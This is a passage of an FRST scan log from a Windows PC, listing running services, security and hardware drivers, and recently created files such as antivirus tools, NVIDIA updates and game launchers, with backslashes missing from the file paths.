R2 bdredline; C:Program FilesCommon FilesBitdefenderSetupInformationBitdefender RedLinebdredline.exe [2195344 2018-03-22] (Bitdefender SRL -> Bitdefender)
R2 bdredline_agent; C:Program FilesBitdefender Agentredlinebdredline.exe [2454632 2022-02-10] (Bitdefender SRL -> Bitdefender)
R2 BdVpnService; C:Program FilesBitdefenderBitdefender VPNbdvpnservice.exe [263328 2022-03-30] (Bitdefender SRL -> Bitdefender)
S2 brave; C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
R2 ClickToRunSvc; C:Program FilesCommon FilesMicrosoft SharedClickToRunOfficeClickToRun.exe [9191816 2022-02-24] (Microsoft Corporation -> Microsoft Corporation)
S3 EpicOnlineServices; C:Program Files (x86)Epic GamesEpic Online ServicesserviceEpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.)
R2 Freedome Service; C:Program Files (x86)F-SecureFreedomeFreedome1.1fsvpnservice.exe [1649864 2022-04-27] (F-Secure Corporation -> F-Secure Corporation)
R2 fshoster; C:Program Files (x86)F-SecureSAFEfshoster32.exe [239256 2022-03-25] (F-Secure Corporation -> F-Secure Corporation)
R2 fsnethoster; C:Program Files (x86)F-SecureSAFEfshoster32.exe [239256 2022-03-25] (F-Secure Corporation -> F-Secure Corporation)
R2 fsulhoster; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe [417048 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
R2 fsulnethoster; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe [417048 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
R2 fsulorsp; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsorsp64.exe [107208 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
R2 fsulprothoster; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsulprothoster.exe [417048 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
S3 GoogleChromeBetaElevationService; C:Program FilesGoogleChrome BetaApplication101.0.4951.41elevation_service.exe [1600912 2022-04-20] (Google LLC -> Google LLC)
S3 MagicianSVC; C:Program Files (x86)SamsungSamsung MagicianSamsungMagicianSVC.exe [347576 2021-12-09] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R2 MBAMService; C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe [8347832 2022-04-25] (Malwarebytes Inc -> Malwarebytes)
R2 ProductAgentService; C:Program FilesBitdefender AgentProductAgentService.exe [786536 2022-03-23] (Bitdefender SRL -> Bitdefender)
R2 rkrtservice; C:Program FilesRogueKillerRogueKillerSvc.exe [14419440 2022-03-07] (ADLICE -> )
R2 SamsungMagicianSVC; C:Program Files (x86)SamsungSamsung MagicianSamsungMagicianSVC.exe [347576 2021-12-09] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 Sense; C:Program FilesWindows Defender Advanced Threat ProtectionMsSense.exe [6207688 2022-04-26] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 UPDATESRV; C:Program FilesBitdefenderBitdefender Securityupdatesrv.exe [284760 2022-04-20] (Bitdefender SRL -> Bitdefender)
R2 VSSERV; C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe [822240 2022-04-20] (Bitdefender SRL -> Bitdefender)
S3 WdNisSvc; C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2203.5-0NisSrv.exe [3116848 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2203.5-0MsMpEng.exe [133544 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WsaService; C:WSAWsaServiceWsaService.exe [229888 2022-04-22] () [File not signed]
R2 NVDisplay.ContainerLocalSystem; C:WINDOWSSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_4d7400884d0d52e3Display.NvContainerNVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%NVIDIANVDisplay.ContainerLocalSystem.log -l 3 -d C:WINDOWSSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_4d7400884d0d52e3Display.NvContainerpluginsLocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystemLocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 amdgpio3; C:WINDOWSSystem32driversamdgpio3.sys [27256 2022-01-27] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc)
R3 AmdTools64; C:WINDOWSSystem32driversAmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> )
R1 atc; C:WINDOWSSystem32DRIVERSatc.sys [3947928 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender S.R.L. Bucharest, ROMANIA)
R2 BdDci; C:WINDOWSsystem32DRIVERSbddci.sys [800672 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S0 bdelam; C:WINDOWSSystem32driversbdelam.sys [22976 2022-04-20] (Microsoft Windows Early Launch Anti-malware Publisher -> Bitdefender)
R0 bdprivmon; C:WINDOWSSystem32DRIVERSbdprivmon.sys [33208 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> © Bitdefender SRL)
S3 bduefiscan; C:WINDOWSsystem32DRIVERSbduefiscan.sys [55864 2022-04-20] (Bitdefender SRL -> Bitdefender)
R1 ESProtectionDriver; C:WINDOWSsystem32driversmbae64.sys [103888 2022-04-25] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 F-Secure Gatekeeper; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsulgk.sys [404512 2022-04-28] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R0 fsbts; C:WINDOWSSystem32driversfsbts.sys [51736 2022-04-26] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R0 fse; C:WINDOWSSystem32driversfse.sys [193896 2022-04-26] (Microsoft Windows -> Microsoft Corporation)
S0 fselms; C:WINDOWSSystem32driversfselms.sys [15816 2022-04-26] (Microsoft Windows Early Launch Anti-malware Publisher -> F-Secure Corporation)
R3 fsfreedomewintun; C:WINDOWSSystem32driversfsfreedomewintun.sys [31248 2021-09-16] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R2 fsnif2; C:Program Files (x86)F-SecureSAFEUltralightnif21643898281nif2s64.sys [172480 2022-04-26] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R3 gdrv3; C:Windowsgdrv3.sys [36352 2022-01-19] (GIGA-BYTE Technology Co., Ltd. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
R0 Gemma; C:WINDOWSSystem32DRIVERSgemma.sys [1188744 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender S.R.L. Bucharest, ROMANIA)
R2 HpReadHWData; C:WINDOWSsystem32driversHpReadHWData.sys [47184 2022-02-03] (HP Inc. -> Windows (R) Win 7 DDK provider)
S3 Hsp; C:WINDOWSSystem32driversHsp.sys [111952 2022-04-26] (Microsoft Windows -> Microsoft Corporation)
R2 Ignis; C:WINDOWSsystem32DRIVERSignis.sys [185312 2020-10-07] (Bitdefender SRL -> Bitdefender)
R2 MBAMChameleon; C:WINDOWSSystem32DriversMbamChameleon.sys [223176 2022-04-27] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S0 MbamElam; C:WINDOWSSystem32DRIVERSMbamElam.sys [21480 2022-04-18] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:WINDOWSSystem32DRIVERSfarflt.sys [193992 2022-04-28] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 MBAMProtection; C:WINDOWSsystem32DRIVERSmbam.sys [70072 2022-04-28] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:WINDOWSSystem32Driversmbamswissarmy.sys [239560 2022-04-27] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 MBAMWebProtection; C:WINDOWSsystem32DRIVERSmwac.sys [158856 2022-04-28] (Malwarebytes Inc -> Malwarebytes)
R3 nvvad_WaveExtensible; C:WINDOWSsystem32driversnvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
R3 phantomtap; C:WINDOWSSystem32driversphantomtap.sys [50248 2022-03-30] (Avira Operations GmbH & Co. KG -> The OpenVPN Project)
R3 rt68cx21; C:WINDOWSSystem32DriverStoreFileRepositoryrt68cx21x64.inf_amd64_9bf8409c8d4e92a5rt68cx21x64.sys [625560 2022-04-12] (Realtek Semiconductor Corp. -> Realtek)
R3 tap0901; C:WINDOWSSystem32driverstap0901.sys [47920 2020-02-20] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
U3 TrueSight; C:WindowsSystem32driverstruesight.sys [38032 2022-04-28] (Adlice -> )
R0 trufos; C:WINDOWSSystem32DRIVERStrufos.sys [623008 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
R0 vlflt; C:WINDOWSSystem32DRIVERSvlflt.sys [485792 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 vmbusproxy; C:WINDOWSsystem32driversvmbusproxy.sys [90112 2022-04-26] (Microsoft Windows -> )
S3 WdBoot; C:WINDOWSsystem32driverswdWdBoot.sys [49600 2022-04-08] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:WINDOWSsystem32driverswdWdFilter.sys [443664 2022-04-08] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:WINDOWSSystem32driverswdWdNisDrv.sys [90384 2022-04-08] (Microsoft Windows -> Microsoft Corporation)
S3 HWiNFO_170; ??C:UsersPhenomAppDataLocalTempHWiNFO64A_170.SYS [X] <==== ATTENTION
S1 WinSetupMon; system32DRIVERSWinSetupMon.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-04-28 19:03 - 2022-04-28 19:04 - 000041023 _____ C:UsersPhenomDesktopFRST.txt
2022-04-28 18:45 - 2022-04-28 18:40 - 002366976 _____ (Farbar) C:UsersPhenomDesktopFRST64.exe
2022-04-28 18:41 - 2022-04-28 19:03 - 000000000 ____D C:FRST
2022-04-28 18:40 - 2022-04-28 18:40 - 002366976 _____ (Farbar) C:UsersPhenomDownloadsFRST64.exe
2022-04-28 18:23 - 2022-04-28 18:23 - 000193992 _____ (Malwarebytes) C:WINDOWSsystem32Driversfarflt.sys
2022-04-28 18:23 - 2022-04-28 18:23 - 000158856 _____ (Malwarebytes) C:WINDOWSsystem32Driversmwac.sys
2022-04-28 18:23 - 2022-04-28 18:23 - 000070072 _____ (Malwarebytes) C:WINDOWSsystem32Driversmbam.sys
2022-04-28 18:23 - 2022-04-28 18:23 - 000000000 ____D C:UsersPhenomAppDataLocalLowIGDump
2022-04-28 18:21 - 2022-04-28 18:21 - 000000000 ____D C:WINDOWSsystem32TasksKpRm-quarantines
2022-04-28 18:21 - 2022-04-28 18:21 - 000000000 ____D C:KPRM
2022-04-28 18:19 - 2022-04-28 18:19 - 002811112 _____ (kernel-panik) C:UsersPhenomDownloadskprm_2.9.3 (2).exe
2022-04-28 18:19 - 2022-04-28 18:19 - 002811112 _____ (kernel-panik) C:UsersPhenomDownloadskprm_2.9.3 (1).exe
2022-04-28 18:13 - 2022-04-28 19:18 - 000000000 ____D C:UsersPhenomDocuments20220428
2022-04-28 17:46 - 2022-04-28 17:46 - 011331520 _____ (SurfRight B.V.) C:UsersPhenomDownloadsHitmanPro_x64 (1).exe
2022-04-28 17:41 - 2022-04-28 17:41 - 000012872 _____ (SurfRight B.V.) C:WINDOWSsystem32bootdelete.exe
2022-04-28 17:38 - 2022-04-28 17:38 - 000040976 _____ C:WINDOWSsystem32Drivershitmanpro37.sys
2022-04-28 17:31 - 2022-04-28 17:38 - 000000000 ____D C:Program FilesHitmanPro
2022-04-28 17:30 - 2022-04-28 17:30 - 014239168 _____ (SurfRight B.V.) C:UsersPhenomDownloadsHitmanPro_x64.exe
2022-04-28 16:33 - 2022-04-28 16:33 - 002811112 _____ (kernel-panik) C:UsersPhenomDownloadskprm_2.9.3.exe
2022-04-28 14:55 - 2022-04-28 18:23 - 000000000 ____D C:UsersPhenomAppDataRoamingSlack
2022-04-28 14:55 - 2022-04-28 14:55 - 102072640 _____ (Slack Technologies Inc.) C:UsersPhenomDownloadsSlackSetup.exe
2022-04-28 14:55 - 2022-04-28 14:55 - 000002208 _____ C:UsersPhenomDesktopSlack.lnk
2022-04-28 14:55 - 2022-04-28 14:55 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsSlack Technologies Inc
2022-04-28 14:55 - 2022-04-28 14:55 - 000000000 ____D C:UsersPhenomAppDataLocalslack
2022-04-28 03:20 - 2022-04-28 03:21 - 184206126 _____ C:UsersPhenomDownloadsX-230120NBREX.rar
2022-04-28 03:00 - 2022-04-28 18:23 - 000038032 _____ C:WINDOWSsystem32Driverstruesight.sys
2022-04-28 02:52 - 2022-04-28 02:59 - 000426192 _____ C:WINDOWSntbtlog.txt
2022-04-28 02:42 - 2022-04-28 02:42 - 000004322 _____ C:UsersPhenomDownloadsAdd_Take_Ownership_to_context_menu.reg
2022-04-28 01:27 - 2022-04-28 01:27 - 000014790 _____ C:UsersPhenomDownloadsffz-settings (2022-4-28).json
2022-04-27 21:50 - 2022-04-27 21:50 - 000000000 ____D C:WINDOWSLastGood.Tmp
2022-04-27 18:42 - 2022-04-21 21:37 - 001905936 _____ C:WINDOWSsystem32vulkaninfo-1-999-0-0-0.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001905936 _____ C:WINDOWSsystem32vulkaninfo.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001478416 _____ C:WINDOWSSysWOW64vulkaninfo-1-999-0-0-0.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001478416 _____ C:WINDOWSSysWOW64vulkaninfo.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001432336 _____ C:WINDOWSsystem32vulkan-1-999-0-0-0.dll
2022-04-27 18:42 - 2022-04-21 21:37 - 001432336 _____ C:WINDOWSsystem32vulkan-1.dll
2022-04-27 18:42 - 2022-04-21 21:37 - 001145616 _____ C:WINDOWSSysWOW64vulkan-1-999-0-0-0.dll
2022-04-27 18:42 - 2022-04-21 21:37 - 001145616 _____ C:WINDOWSSysWOW64vulkan-1.dll
2022-04-27 18:42 - 2022-04-21 21:36 - 001467992 _____ (Khronos Group) C:WINDOWSsystem32OpenCL.dll
2022-04-27 18:42 - 2022-04-21 21:36 - 001209432 _____ (Khronos Group) C:WINDOWSSysWOW64OpenCL.dll
2022-04-27 18:42 - 2022-04-21 21:34 - 000586464 _____ C:WINDOWSsystem32nvofapi64.dll
2022-04-27 18:42 - 2022-04-21 21:34 - 000461400 _____ C:WINDOWSSysWOW64nvofapi.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 001530432 _____ (NVIDIA Corporation) C:WINDOWSsystem32NvIFR64.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 001177288 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64NvIFR.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 000725568 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvml.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 000712392 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvidia-smi.exe
2022-04-27 18:42 - 2022-04-21 21:32 - 002120928 _____ (NVIDIA Corporation) C:WINDOWSsystem32NvFBC64.dll
2022-04-27 18:42 - 2022-04-21 21:32 - 001603152 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64NvFBC.dll
2022-04-27 18:42 - 2022-04-21 21:32 - 000730328 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvEncodeAPI64.dll
2022-04-27 18:42 - 2022-04-21 21:32 - 000581848 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvEncodeAPI.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 006963912 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvcuvid.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 006226632 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvcuvid.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 005729856 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvcpl.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 005100744 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvcuda.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 002932936 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvcuda.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 000457928 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvdebugdump.exe
2022-04-27 18:42 - 2022-04-21 21:30 - 000852048 _____ (NVIDIA Corporation) C:WINDOWSsystem32MCU.exe
2022-04-27 18:42 - 2022-04-21 05:16 - 000089337 _____ C:WINDOWSsystem32nvinfo.pb
2022-04-27 17:32 - 2022-04-27 17:32 - 000000000 ____D C:ProgramDataBlizzard Entertainment
2022-04-27 17:30 - 2022-04-28 19:13 - 000000000 ____D C:UsersPhenomAppDataLocalBattle.net
2022-04-27 17:30 - 2022-04-27 17:32 - 000000000 ____D C:UsersPhenomAppDataRoamingBattle.net
2022-04-27 17:30 - 2022-04-27 17:30 - 000000940 _____ C:UsersPublicDesktopBattle.net.lnk
2022-04-27 17:30 - 2022-04-27 17:30 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsBattle.net
2022-04-27 17:29 - 2022-04-28 02:04 - 000000000 ____D C:Program Files (x86)Battle.net
2022-04-27 17:29 - 2022-04-27 17:29 - 000000000 ____D C:UsersPhenomAppDataLocalBlizzard Entertainment
2022-04-27 17:29 - 2022-04-27 17:29 - 000000000 ____D C:ProgramDataBattle.net
2022-04-27 17:28 - 2022-04-27 17:29 - 004837816 _____ (Blizzard Entertainment) C:UsersPhenomDownloadsBattle.net-Setup.exe
2022-04-27 13:38 - 2022-04-27 13:38 - 098870710 _____ C:UsersPhenomDownloadsffmpeg-944b8c9-ff31946-win64-nonfree.7z
2022-04-27 13:37 - 2022-04-27 13:37 - 012037363 _____ C:UsersPhenomDownloadsffmpeg-snapshot.tar.bz2
2022-04-27 13:28 - 2022-04-27 13:28 - 012975058 _____ C:UsersPhenomDownloadsTwitchDownloaderCLI-Windows-x64.zip
2022-04-27 13:28 - 2022-04-27 13:28 - 000000000 ____D C:Program FilesTwitch VOD Downloader
2022-04-27 01:32 - 2022-04-27 01:32 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsFreedome
2022-04-27 01:29 - 2022-04-27 01:32 - 000002464 _____ C:UsersPublicDesktopFreedome.lnk
2022-04-26 23:02 - 2022-04-26 23:02 - 000196096 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:WINDOWSSysWOW64l3codecp.acm
2022-04-26 23:01 - 2022-04-26 23:01 - 000831488 _____ (Microsoft Corporation) C:WINDOWSsystem32Bubbles.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000774144 _____ C:WINDOWSsystem32FsNVSDeviceSource.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000557056 _____ (Microsoft Corporation) C:WINDOWSsystem32PhotoScreensaver.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000485376 _____ (Microsoft Corporation) C:WINDOWSSysWOW64PhotoScreensaver.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000442368 _____ (Microsoft Corporation) C:WINDOWSsystem32html.iec
2022-04-26 23:01 - 2022-04-26 23:01 - 000353624 _____ C:WINDOWSsystem32vp9fs.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000341504 _____ (Microsoft Corporation) C:WINDOWSSysWOW64html.iec
2022-04-26 23:01 - 2022-04-26 23:01 - 000323584 _____ (Microsoft Corporation) C:WINDOWSsystem32unimdm.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000254976 _____ (Microsoft Corporation) C:WINDOWSSysWOW64unimdm.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000253952 _____ (Microsoft Corporation) C:WINDOWSsystem32ssText3d.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000208896 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:WINDOWSsystem32l3codecp.acm
2022-04-26 23:01 - 2022-04-26 23:01 - 000188416 _____ C:WINDOWSsystem32EsclProtocol.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000176128 _____ (Microsoft Corporation) C:WINDOWSsystem32Ribbons.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000176128 _____ (Microsoft Corporation) C:WINDOWSsystem32Mystify.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000122880 _____ (Microsoft Corporation) C:WINDOWSsystem32remotesp.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000088064 _____ (Microsoft Corporation) C:WINDOWSSysWOW64remotesp.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000079208 _____ C:WINDOWSsystem32DriversNDKPerf.sys
2022-04-26 23:01 - 2022-04-26 23:01 - 000061440 _____ (Microsoft Corporation) C:WINDOWSsystem32hidphone.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000046592 _____ (Microsoft Corporation) C:WINDOWSSysWOW64format.com
2022-04-26 23:01 - 2022-04-26 23:01 - 000032768 _____ (Microsoft Corporation) C:WINDOWSSysWOW64hidphone.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000027136 _____ (Microsoft Corporation) C:WINDOWSSysWOW64mode.com
2022-04-26 23:01 - 2022-04-26 23:01 - 000024576 _____ (Microsoft Corporation) C:WINDOWSSysWOW64more.com
2022-04-26 23:01 - 2022-04-26 23:01 - 000019456 _____ C:WINDOWSSysWOW64WsdProviderUtil.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000017920 _____ (Microsoft Corporation) C:WINDOWSSysWOW64tree.com
2022-04-26 23:00 - 2022-04-26 23:00 - 002125824 _____ C:WINDOWSsystem32dwmscene.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000460800 _____ C:WINDOWSSysWOW64SettingSyncDownloadHelper.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000356352 _____ C:WINDOWSsystem32Windows.Internal.UI.Shell.WindowTabManager.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000335872 _____ C:WINDOWSsystem32Windows.Internal.UI.Dialogs.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000311296 _____ C:WINDOWSsystem32EsclScan.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000294912 _____ C:WINDOWSsystem32pnpdiag.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000208896 _____ C:WINDOWSsystem32BthpanContextHandler.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000098304 _____ C:WINDOWSsystem32sstpcfg.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000086016 _____ C:WINDOWSsystem32printticketvalidation.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000086016 _____ C:WINDOWSsystem32CredProvCommonCore.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000077824 _____ C:WINDOWSsystem32APMonUI.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000069632 _____ (Microsoft Corporation) C:WINDOWSsystem32kmddsp.tsp
2022-04-26 23:00 - 2022-04-26 23:00 - 000065536 _____ (Microsoft Corporation) C:WINDOWSsystem32format.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000051712 _____ C:WINDOWSSysWOW64CredProvCommonCore.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000049152 _____ (Microsoft Corporation) C:WINDOWSsystem32more.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000049152 _____ (Microsoft Corporation) C:WINDOWSsystem32mode.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000042744 _____ C:WINDOWSsystem32wow64base.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000040960 _____ (Microsoft Corporation) C:WINDOWSsystem32tree.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000039424 _____ (Microsoft Corporation) C:WINDOWSSysWOW64kmddsp.tsp
2022-04-26 23:00 - 2022-04-26 23:00 - 000038784 _____ (Microsoft Corporation) C:WINDOWSSysWOW64msgsm32.acm
2022-04-26 23:00 - 2022-04-26 23:00 - 000034128 _____ (Microsoft Corporation) C:WINDOWSSysWOW64imaadp32.acm
2022-04-26 23:00 - 2022-04-26 23:00 - 000033576 _____ (Microsoft Corporation) C:WINDOWSSysWOW64msadp32.acm
2022-04-26 23:00 - 2022-04-26 23:00 - 000032768 _____ (Microsoft Corporation) C:WINDOWSSysWOW64scrnsave.scr
2022-04-26 23:00 - 2022-04-26 23:00 - 000015016 _____ C:WINDOWSsystem32DrtmAuthTxt.wim
2022-04-26 22:59 - 2022-04-26 22:59 - 000643072 _____ C:WINDOWSsystem32SettingSyncDownloadHelper.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000335872 _____ C:WINDOWSsystem32Windows.Management.InprocObjects.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000286720 _____ C:WINDOWSsystem32Microsoft.Bluetooth.Audio.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000180224 _____ C:WINDOWSsystem32CloudExperienceHostRedirection.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000067512 _____ (Microsoft Corporation) C:WINDOWSsystem32msgsm32.acm
2022-04-26 22:59 - 2022-04-26 22:59 - 000063384 _____ (Microsoft Corporation) C:WINDOWSsystem32imaadp32.acm
2022-04-26 22:59 - 2022-04-26 22:59 - 000061440 _____ (Microsoft Corporation) C:WINDOWSsystem32scrnsave.scr
2022-04-26 22:59 - 2022-04-26 22:59 - 000059248 _____ (Microsoft Corporation) C:WINDOWSsystem32msadp32.acm
2022-04-26 22:59 - 2022-04-26 22:59 - 000040960 _____ C:WINDOWSsystem32WsdProviderUtil.dll
2022-04-26 22:45 - 2022-04-26 22:45 - 000000000 ___HD C:$WinREAgent
2022-04-26 21:53 - 2022-04-26 21:55 - 000000000 ____D C:UsersPhenomDocuments20220426
2022-04-26 20:04 - 2022-04-26 20:04 - 000000020 ___SH C:UsersUserntuser.ini
2022-04-26 19:58 - 2022-04-28 19:15 - 000000000 ____D C:UsersPhenomAppDataRoamingdiscordcanary
2022-04-26 19:58 - 2022-04-28 18:23 - 000000000 ____D C:UsersPhenomAppDataLocalDiscordCanary
2022-04-26 19:58 - 2022-04-26 19:58 - 083143168 _____ (Discord Inc.) C:UsersPhenomDownloadsDiscordCanarySetup (2).exe
2022-04-26 19:58 - 2022-04-26 19:58 - 000002324 _____ C:UsersPhenomDesktopDiscord Canary.lnk
2022-04-26 19:58 - 2022-04-26 19:58 - 000000000 ____D C:UsersPhenomAppDataRoamingdiscord
2022-04-26 19:55 - 2022-04-27 13:22 - 000223176 _____ (Malwarebytes) C:WINDOWSsystem32DriversMbamChameleon.sys
2022-04-26 19:49 - 2022-04-26 19:49 - 000000000 ____D C:ProgramDataMicrosoft OneDrive
2022-04-26 19:48 - 2022-04-26 19:48 - 000000020 ___SH C:UsersPhenomntuser.ini
2022-04-26 18:31 - 2022-04-28 18:22 - 000000006 ____H C:WINDOWSTasksSA.DAT
2022-04-26 18:31 - 2022-04-28 18:12 - 000003658 _____ C:WINDOWSsystem32TasksCreateExplorerShellUnelevatedTask
2022-04-26 18:31 - 2022-04-27 17:18 - 000004308 _____ C:WINDOWSsystem32TasksNvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003976 _____ C:WINDOWSsystem32TasksNVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003940 _____ C:WINDOWSsystem32TasksNvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003894 _____ C:WINDOWSsystem32TasksNvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003654 _____ C:WINDOWSsystem32TasksNvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
